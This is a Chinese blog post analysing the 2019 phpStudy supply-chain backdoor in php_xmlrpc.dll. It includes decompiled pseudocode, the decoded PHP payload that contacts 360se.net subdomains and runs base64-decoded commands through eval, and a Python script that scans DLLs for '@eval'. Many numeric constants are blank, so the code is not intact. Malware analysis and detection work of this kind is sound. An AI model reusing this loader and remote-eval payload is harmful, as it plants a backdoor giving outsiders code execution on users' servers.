2019关于phpstudy软件后门简单分析
2024-09-01 08:48:38
2019.9.20得知非官网的一些下载站中的phpstudy版本存在后门文件 说是官网下的就没有后门
20号出现的新闻 今天phpstudy官网21号又更新一波 不太好说这是什么操作哦 此地无银三百两?
很开心的说 我以前的虚拟机装的应该是有后门版本(任何文件我从来都是官网下文件) 用chamd5的检测py
哎~~学个php都被搞哦 跟着大佬团队文章也动手找找后门把
chamd5团队老哥发现是php_xmlrpc.dll中的问题 直接站人家肩膀把 看看这个dll
php_xmlrpc.dll @eval函数
.data:1000DE98
gzuncompress函数解密执行payload 以前webshell大马免杀经常用的函数- -
.data:1000DE98 函数sub_10003490
145-177行:
while ( )
{
if ( *(_DWORD *)v13 == )
{
v10[v12] = ;
v43[v12 + ] = *v11;
v12 += ;
v13 += ;
}
else
{
v10[v12++] = *v11;
v13 += ;
}
v11 += ;
if ( (signed int)v11 >= (signed int)asc_1000C66C )
break;
v10 = v43;
}
spprintf(&v43, , a_evalSS, aGzuncompress, v43);
v24 = *(_DWORD *)(*a3 + * executor_globals_id - );
v25 = *(_DWORD *)(v24 + );
*(_DWORD *)(v24 + ) = &v33;
v40 = v25;
v26 = setjmp3(&v33, );
v27 = v40;
if ( v26 )
{
v28 = a3;
*(_DWORD *)(*(_DWORD *)(*a3 + * executor_globals_id - ) + ) = v40;
}
else
{
这里@eval gzuncompress('%s')进行拼接,调用gzuncompress方法解密执行payload,以前webshell大马免杀经常用的函数,上面也看到了函数地址
而gzuncompress解密前的代码是这里的v43
下面是zend_eval_string处执行v43处gzuncompress编码的代码
}
else
{
v28 = a3;
zend_eval_string(v43, , &byte_10011B34, a3);
}
*(_DWORD *)(*(_DWORD *)(*v28 + * executor_globals_id - ) + ) = v27;
if ( dword_1000C010 < )
dword_1000C010 += ;
ftime(&dword_10011D50);
}
v43处执行的代码通过解码:
@ini_set("display_errors","");
error_reporting();
$h = $_SERVER['HTTP_HOST'];
$p = $_SERVER['SERVER_PORT'];
$fp = fsockopen($h, $p, $errno, $errstr, );
if (!$fp) {
} else {
$out = "GET {$_SERVER['SCRIPT_NAME']} HTTP/1.1\r\n";
$out .= "Host: {$h}\r\n";
$out .= "Accept-Encoding: compress,gzip\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
fclose($fp);
}
拼接后v43后解密的代码 明显的fsockopen通信 反弹后门到360se.net的20123端口
@ini_set("display_errors","");
error_reporting();
function tcpGet($sendMsg = '', $ip = '360se.net', $port = ''){
$result = "";
$handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr,);
if( !$handle ){
$handle = fsockopen($ip, intval($port), $errno, $errstr, );
if( !$handle ){
return "err";
}
}
fwrite($handle, $sendMsg."\n");
while(!feof($handle)){
stream_set_timeout($handle, );
$result .= fread($handle, );
$info = stream_get_meta_data($handle);
if ($info['timed_out']) {
break;
}
}
fclose($handle);
return $result;
}
$ds = array("www","bbs","cms","down","up","file","ftp");
$ps = array("","","","","");
$n = false;
do {
$n = false;
foreach ($ds as $d){
$b = false;
foreach ($ps as $p){
$result = tcpGet($i,$d.".360se.net",$p);
if ($result != "err"){
$b =true;
break;
}
}
if ($b)break;
}
$info = explode("<^>",$result);
if (count($info)==){
if (strpos($info[],"/*Onemore*/") !== false){
$info[] = str_replace("/*Onemore*/","",$info[]);
$n=true;
}
@eval(base64_decode($info[]));
}
}while($n);
检查脚本 来自chamd5团队脚本,在phpstudy目录下执行即可递归检查
# -*- coding:utf8 -*-
__author__='pcat@chamd5.org'
__blog__='http://pcat.cc' import os
import string
import re def strings(file) :
chars = string.printable[:94]
shortestReturnChar = 4
regExp = '[%s]{%d,}' % (chars, shortestReturnChar)
pattern = re.compile(regExp)
with open(file, 'rb') as f:
return pattern.findall(f.read()) def grep(lines,pattern):
for line in lines:
if pattern in line:
yield line def pcheck(filename):
# trojan feature
trojan='@eval'
# just check dll file
if filename.endswith('.dll'):
lines=strings(filename)
try:
grep(lines,trojan).next()
except:
return
print '=== {0} ==='.format(filename)
for line in grep(lines,trojan):
print line
pass def foo():
# . stand for current directory
for path, dirs, files in os.walk(".", topdown=False):
for name in files:
pcheck(os.path.join(path, name))
for name in dirs:
pcheck(os.path.join(path, name))
pass if __name__ == '__main__':
foo()
自己斟酌哦 太菜了呢学个php都给人家当鸡
最新文章
- Java中的递归运算
- 基于HT for Web的3D树的实现
- Winform开发框架之读卡器和条码扫描枪的数据接收处理
- eclipse中导入项目后中文成乱码解决办法
- display & visibility区别
- 161125、Java网络编程之统一资源定位符URL
- 《黄聪:手机移动站SEO优化教程》3、如何禁止百度对PC网站进行自动转码
- 一个利用sed和awk处理文本的小栗子
- python练习程序(c100经典例18)
- sublime text2卸载和重新安装
- POJ2752 - Seek the Name, Seek the Fame(KMP)
- Android中配置JDK和SDK的环境变量
- C++单链表的创建与操作
- Caused by: com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL
- js中获取方法名
- JS的去抖、节流
- Target JRE version (1.7.0_79) does not match project JDK version (java version "1.8.0_171"), will use sources from JDK: 1.7
- css一些基础效果
- Jetbrains IDE 中 compass sass 设置
- IE和Chrome执行javascript对鼠标双击事件的不同响应